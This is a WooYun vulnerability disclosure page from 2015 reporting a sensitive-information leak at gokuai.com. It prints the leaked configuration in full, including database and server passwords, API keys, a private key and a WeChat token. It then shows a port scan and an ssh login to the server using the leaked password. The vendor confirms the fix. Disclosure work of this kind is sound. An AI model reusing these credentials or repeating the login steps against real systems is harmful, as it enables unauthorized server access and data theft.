当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161538

漏洞标题:够快云库某系统敏感信息泄漏到服务器沦陷/微信token/数据库密码泄漏等(影响169万企业用户数据)

相关厂商:gokuai.com

漏洞作者: 路人甲

提交时间:2015-12-16 15:56

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经确认,细节仅向厂商公开
2015-12-26: 细节向核心白帽子及相关领域专家公开
2016-01-05: 细节向普通白帽子公开
2016-01-15: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

够快云库某系统敏感信息泄漏到服务器沦陷/微信token/数据库密码泄漏等(影响169万企业用户数据)

详细说明:

http://crm.goukuai.cn/auth/login
http://121.199.3.197/login

YUNKU.CRM_CLIENT_ID	59033a1e2c3c8c60f9bcf23eee51974d
YUNKU.CRM_CLIENT_SECRET e8cee4610343e2d951a9a875354063fe
YUNKU.DB_HOST rdsquzbunurvfez.mysql.rds.aliyuncs.com
YUNKU.DB_DATABASE gktest
YUNKU.DB_USER_NAME gokuaitestuser
YUNKU.DB_USER_PSW alaserver
YUNKU.SERVER_PSW gokua1server
YUNKU.SERVER_USER_NAME ala
YUNKU.SERVER_ROOT /home/ala
CRM.DB_HOST 127.0.0.1:3306
CRM.DB_DATABASE gkstat_test
CRM.DB_USER_NAME ala_product
CRM.DB_USER_PSW gokuai1server
CRM.SERVER_USER_NAME ala
CRM.SERVER_PSW gokua1server
CRM.SERVER_ROOT /home/ala
CRM.MEMCACHED_HOST 127.0.0.1
CRM.MEMCACHED_PORT 22122
MAIL.HOST mail.gokuai.com
MAIL.DEBUG
WECHAT.TOKEN P4pKKWBvhtdA4IZDR7Q4NtCa4f
DOMAIN.YUNKU zk.goukuai.cn
PRIVATE_KEY A7yVktb5tLILZlra8qqP47DiKF8xFcZm
API_KEY 57ab07936c42b9139facc4e9f996afa3


屏幕快照 2015-12-15 下午1.50.32.png

漏洞证明:

CRM.SERVER_USER_NAME ala
CRM.SERVER_PSW gokua1server
可能是服务器密码,尝试连接发现22端口没开,猜测可能换了端口,扫描之

PORT      STATE SERVICE
80/tcp open http
443/tcp open https
3306/tcp open mysql
11300/tcp open unknown
27822/tcp open unknown


ssh -p 27822 [email protected] 密码为:gokua1server
果断连上了

屏幕快照 2015-12-15 下午3.59.47.png


屏幕快照 2015-12-15 下午4.00.29.png


屏幕快照 2015-12-15 下午3.54.49.png


数据库里还有一大堆敏感内容 就不乱翻了,点到为止

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-16 16:18

厂商回复:

感谢发现漏洞, 已修复

最新状态:

暂无